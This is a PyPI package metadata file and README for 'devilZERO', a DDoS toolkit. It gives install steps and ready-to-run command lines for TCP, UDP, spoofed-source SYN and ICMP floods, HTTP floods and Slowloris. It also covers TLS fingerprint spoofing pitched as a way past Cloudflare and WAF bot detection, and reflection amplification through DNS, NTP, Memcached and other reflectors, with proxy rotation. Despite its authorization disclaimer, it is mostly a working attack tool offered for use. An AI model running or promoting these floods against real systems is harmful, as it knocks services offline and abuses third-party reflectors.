Metadata-Version: 2.4
Name: devilzero
Version: 2.0.0
Summary: Modular DDoS stress-testing toolkit for authorized security assessments
Author-email: Voktha <voktha@proton.me>
License-Expression: MIT
Project-URL: Homepage, https://github.com/ValkorX/devilZERO
Project-URL: Repository, https://github.com/ValkorX/devilZERO
Project-URL: Bug Tracker, https://github.com/ValkorX/devilZERO/issues
Keywords: ddos,stress-testing,penetration-testing,red-team,network-security,flood,layer4,layer7,amplification,security-research,cybersecurity
Classifier: Development Status :: 4 - Beta
Classifier: Environment :: Console
Classifier: Intended Audience :: Information Technology
Classifier: Intended Audience :: System Administrators
Classifier: Operating System :: POSIX :: Linux
Classifier: Operating System :: MacOS
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.8
Classifier: Programming Language :: Python :: 3.9
Classifier: Programming Language :: Python :: 3.10
Classifier: Programming Language :: Python :: 3.11
Classifier: Programming Language :: Python :: 3.12
Classifier: Programming Language :: Python :: 3.13
Classifier: Programming Language :: Python :: 3.14
Classifier: Topic :: Security
Classifier: Topic :: System :: Networking
Requires-Python: >=3.8
Description-Content-Type: text/markdown
License-File: LICENSE
Requires-Dist: requests>=2.28.0
Requires-Dist: certifi>=2024.0.0
Requires-Dist: yarl>=1.7.2
Requires-Dist: impacket>=0.12.0
Requires-Dist: PySocks>=1.7.1
Requires-Dist: curl_cffi>=0.7.0
Requires-Dist: urllib3<3,>=1.26.0
Dynamic: license-file

<div align="center">

<img src="https://capsule-render.vercel.app/api?type=rect&color=0:0d0000,50:3d0000,100:0d0000&height=160&text=devilZERO&fontSize=72&fontColor=ff3333&fontAlignY=60&desc=Modular%20DDoS%20Stress-Testing%20Toolkit&descSize=18&descAlignY=85&descColor=cc3333&stroke=ff3333&strokeWidth=1" width="100%"/>

<br/>

[![Version](https://img.shields.io/badge/version-2.0.0-ff3333?style=for-the-badge&labelColor=0d0000)](https://github.com/ValkorX/DevilZero/releases)
&nbsp;
[![PyPI](https://img.shields.io/pypi/v/devilzero?style=for-the-badge&logo=pypi&logoColor=white&labelColor=0d0000&color=ff3333)](https://pypi.org/project/devilzero/)
&nbsp;
[![Python](https://img.shields.io/badge/Python-3.8+-3572A5?style=for-the-badge&logo=python&logoColor=white&labelColor=0d0000)](https://www.python.org/)
&nbsp;
[![License](https://img.shields.io/badge/License-MIT-8b5cf6?style=for-the-badge&labelColor=0d0000)](LICENSE)
&nbsp;
[![Platform](https://img.shields.io/badge/Linux%20%7C%20macOS-gray?style=for-the-badge&logo=linux&logoColor=white&labelColor=0d0000)](https://github.com/ValkorX/DevilZero)

</div>

---

> [!WARNING]
> **devilZERO is intended exclusively for authorized security assessments, penetration testing engagements, and educational research. Using this tool against systems you do not own or have explicit written permission to test is illegal and unethical. The author assumes no liability for misuse.**

---

## Overview

**devilZERO** is a modular, Python-based stress-testing toolkit covering the most common DDoS vector categories. Designed for red team operators and network security researchers who need a clean, scriptable tool without unnecessary overhead.

```
  ██████╗ ███████╗██╗   ██╗██╗██╗     ███████╗███████╗██████╗  ██████╗
  ██╔══██╗██╔════╝██║   ██║██║██║     ╚══███╔╝██╔════╝██╔══██╗██╔═══██╗
  ██║  ██║█████╗  ██║   ██║██║██║       ███╔╝ █████╗  ██████╔╝██║   ██║
  ██║  ██║██╔══╝  ╚██╗ ██╔╝██║██║      ███╔╝  ██╔══╝  ██╔══██╗██║   ██║
  ██████╔╝███████╗ ╚████╔╝ ██║███████╗███████╗███████╗██║  ██║╚██████╔╝
  ╚═════╝ ╚══════╝  ╚═══╝  ╚═╝╚══════╝╚══════╝╚══════╝╚═╝  ╚═╝ ╚═════╝
                         v2.0.0 — Voktha / ValkorX
```

---

## Features

| Layer | Methods | Notes |
|-------|---------|-------|
| **Layer 4** | TCP · UDP · SYN · ICMP | SYN/ICMP require root |
| **Layer 7** | GET · POST · Slowloris · TLS | Full HTTP/HTTPS + TLS fingerprint spoofing |
| **Amplification** | DNS · NTP · RDP · CLDAP · Memcached · CharGen · ARD | Requires root + reflector list |

- **Interactive TUI** — guided menu for quick sessions
- **CLI mode** — fully scriptable for automation and pipelines
- **Proxy support** — auto-download and rotation from public SOCKS4/SOCKS5/HTTP lists (parallel download)
- **Progress bar** — real-time attack progress in terminal
- **Docker ready** — isolated container deployment

---

## Installation

### One-liner via PyPI — `pipx` (recommended)

```bash
pipx install devilzero
devilzero
```

> `pipx` installs the `devilzero` command globally in an isolated environment — no venv, no conflicts.
> Install pipx with: `pip install --user pipx && pipx ensurepath`

### PyPI via `pip`

```bash
pip install --user devilzero
devilzero
```

> Ensure `~/.local/bin` is in your `PATH`.

### From source — `pipx`

```bash
git clone https://github.com/ValkorX/DevilZero.git
cd DevilZero
pipx install .
devilzero
```

### From source — `pip`

```bash
git clone https://github.com/ValkorX/DevilZero.git
cd DevilZero
pip install --user .
devilzero
```

### Docker

```bash
git clone https://github.com/ValkorX/DevilZero.git
cd DevilZero
docker build -t devilzero .
docker run -it --rm devilzero
```

### Development

```bash
git clone https://github.com/ValkorX/DevilZero.git
cd DevilZero
python3 -m venv venv && source venv/bin/activate
pip install -e .
devilzero
```

---

## Usage

### Interactive Menu

```bash
devilzero
```

```
  Main Menu:
  1) Layer4 (TCP/UDP/SYN/ICMP)
  2) Layer7 (GET/POST/SLOW/TLS)
  3) Amplification (DNS/NTP/RDP/CLDAP/MEM/CHAR/ARD)
  4) Exit
```

The menu prompts for target, method, thread count, duration, and proxy settings with sensible defaults.

### CLI — Layer 4

```bash
# TCP flood
devilzero --layer4 192.168.1.100 80 TCP 200 --duration 60

# UDP flood
devilzero --layer4 192.168.1.100 53 UDP 200 --duration 60

# SYN flood (root required)
sudo devilzero --layer4 192.168.1.100 80 SYN 100 --duration 60

# ICMP flood (root required)
sudo devilzero --layer4 192.168.1.100 0 ICMP 100 --duration 60
```

### CLI — Layer 7

```bash
# HTTP GET flood
devilzero --layer7 http://192.168.1.100 GET 300 --duration 120

# HTTP POST flood
devilzero --layer7 http://192.168.1.100 POST 300 --duration 120

# Slowloris — connection exhaustion
devilzero --layer7 http://192.168.1.100 SLOW 500 --duration 180

# TLS fingerprint spoofing (bypasses JA3/JA4 WAF detection)
devilzero --layer7 https://192.168.1.100 TLS 200 --duration 120

# Multiple requests per connection
devilzero --layer7 http://192.168.1.100 GET 200 --rpc 10 --duration 60

# With proxy rotation
devilzero --layer7 https://192.168.1.100 TLS 200 --duration 120 --proxy-file proxies.txt --proxy-type 5
```

### CLI — Amplification

```bash
# DNS amplification (root required)
sudo devilzero --amp 192.168.1.100 53 DNS 50 /path/to/reflectors.txt --duration 60

# NTP amplification
sudo devilzero --amp 192.168.1.100 123 NTP 50 /path/to/reflectors.txt --duration 60
```

Reflector file format — one IP per line:
```
1.2.3.4
5.6.7.8
```

### Global flags

| Flag | Default | Description |
|------|---------|-------------|
| `--duration N` | `60` | Attack duration in seconds (must be > 0) |
| `--rpc N` | `1` | Requests per connection (layer7 only) |
| `--proxy-file PATH` | — | Proxy file for layer7 (one `host:port` per line) |
| `--proxy-type N` | `5` | Proxy type: `1`=HTTP, `4`=SOCKS4, `5`=SOCKS5 |
| `--version` | — | Print version and exit |

---

## Method Reference

### Layer 4

| Method | Protocol | Root | Description |
|--------|----------|------|-------------|
| `TCP` | TCP | No | Raw TCP connection flood |
| `UDP` | UDP | No | High-volume UDP datagram flood |
| `SYN` | TCP/RAW | **Yes** | SYN flood with randomized spoofed source IP |
| `ICMP` | ICMP/RAW | **Yes** | ICMP echo request flood |

### Layer 7

| Method | Description |
|--------|-------------|
| `GET` | HTTP GET flood with randomized User-Agent and Referer |
| `POST` | HTTP POST flood with randomized body |
| `SLOW` | Slowloris — keeps connections open, exhausts server thread pool |
| `TLS` | Browser TLS/JA3/JA4 fingerprint spoofing via `curl_cffi` — bypasses Cloudflare and WAF bot detection |

### Amplification

| Method | Port | Amplification factor |
|--------|------|---------------------|
| `DNS` | 53 | ~28–54× |
| `NTP` | 123 | ~556× |
| `RDP` | 3389 | ~85× |
| `CLDAP` | 389 | ~56–70× |
| `MEM` | 11211 | ~10,000–51,000× |
| `CHAR` | 19 | ~350× |
| `ARD` | 3283 | ~35× |

---

## Requirements

- Python 3.8+
- Linux / macOS (Windows untested)
- Root privileges for: SYN, ICMP, all amplification methods

Dependencies are installed automatically by pip/pipx. See [`requirements.txt`](requirements.txt) for the full list.

---

## Project Structure

```
devilZERO/
├── devilzero/
│   ├── main.py           # Entry point, CLI parser, interactive menu
│   ├── layer4.py         # TCP/UDP/SYN/ICMP + amplification workers
│   ├── layer7.py         # HTTP GET/POST/Slowloris/TLS workers
│   ├── amplification.py  # Amplification stub (logic lives in layer4.py)
│   ├── proxy.py          # Proxy pool loader, parallel downloader, rotator
│   ├── config.py         # Configuration loader
│   ├── utils.py          # Colors, banner, packet helpers
│   └── data/
│       ├── config.json   # Proxy provider URLs
│       ├── useragent.txt # User-agent pool (932 entries)
│       ├── referers.txt  # Referer pool (574 entries)
│       └── headers.txt   # Additional HTTP headers pool
├── Dockerfile
├── docker-compose.yml
├── pyproject.toml
└── requirements.txt
```

---

## Publishing / Updating

Maintainer workflow to publish a new release to PyPI:

```bash
# 1. Bump version in pyproject.toml and devilzero/__init__.py
# 2. Build
python3 -m build

# 3. Verify the package
twine check dist/*

# 4. Upload to PyPI (requires API token)
twine upload dist/*
# or with token inline:
# TWINE_USERNAME=__token__ TWINE_PASSWORD=pypi-... twine upload dist/*
```

After upload, users can install with:
```bash
pipx install devilzero          # global, isolated
pip install --user devilzero    # user install
```

---

## Legal Disclaimer

This tool is provided **for educational and authorized testing purposes only**. The author (**Voktha / ValkorX**) is not responsible for any damage, legal consequences, or misuse resulting from the use of this software.

Before using devilZERO:
- Obtain **written authorization** from the system owner
- Comply with all applicable **local and international laws**
- Never target infrastructure you do not own or have permission to test

Unauthorized use of this tool may violate the Computer Fraud and Abuse Act (CFAA), the Computer Misuse Act, or equivalent legislation in your jurisdiction.

---

<div align="center">

**Voktha** · Red Team Operator

[![GitHub](https://img.shields.io/badge/ValkorX-ff3333?style=for-the-badge&logo=github&logoColor=white&labelColor=0d0000)](https://github.com/ValkorX)

</div>
